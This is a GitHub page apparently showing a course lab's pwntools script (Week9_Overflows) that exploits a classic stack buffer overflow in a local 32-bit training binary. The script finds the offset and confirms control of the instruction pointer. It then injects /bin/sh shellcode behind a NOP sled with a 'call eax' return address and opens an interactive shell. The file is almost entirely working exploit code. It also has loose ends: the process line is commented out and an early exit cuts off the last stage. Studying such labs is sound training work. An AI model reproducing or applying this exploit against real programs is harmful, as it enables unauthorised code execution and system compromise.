Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
245-Labs/Week9_Overflows/Classic_Overflows/exploit.py
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
66 lines (46 sloc)
1.21 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(os='linux', arch='i386') | |
| context.log_level = "debug" | |
| # OFFSET to Control EIP | |
| OFFSET = 316 | |
| TARGET = "./overflow" | |
| evil = shellcraft.sh() | |
| #print(evil) | |
| #import sys | |
| #sys.exit(0) | |
| # Load the Binary as a process | |
| #proc = process(TARGET) | |
| # Pause the Program to allow us to connect with GDB | |
| pause() | |
| # And Read the Data from it. | |
| out = proc.readuntil("Stack\n") | |
| print("First Line {0}".format(out)) | |
| # Stage 1: Find the offset. | |
| # Send our payload to the Target | |
| #proc.writeline(cyclic(44)) | |
| # Stage 2: Confirm we have control of the Instruction pointer. | |
| payload = b"A" | |
| payload += b"B"*40 | |
| payload += b"ZZZZ" | |
| #payload += b"\x90"*(OFFSET-4) | |
| #payload += b"CBBC" | |
| proc.writeline(payload) | |
| import sys | |
| sys.exit(0) | |
| #EAX ADDRESS IS 0xffffcdd0 | |
| #EAX_ADDR = 0xffffcdd0 | |
| #With Ret 2 Reg we can use call EAX | |
| # find this with $objdump -D | grep call | grep eax | |
| CALL_EAX = 0x8049019 | |
| payload = b"\x90"*10 | |
| payload += asm(evil) | |
| payload += b"\x90"*(OFFSET - len(payload)) | |
| #payload += b"BBBB" | |
| #payload += p32(EAX_ADDR) | |
| payload += p32(CALL_EAX) | |
| print("SANITY CHECK ON PAYLOAD LEN {0}".format(len(payload))) | |
| proc.writeline(payload) | |
| # Get the response back | |
| proc.interactive() | |
| #out =proc.read() | |
| print("Second Line {0}".format(out)) |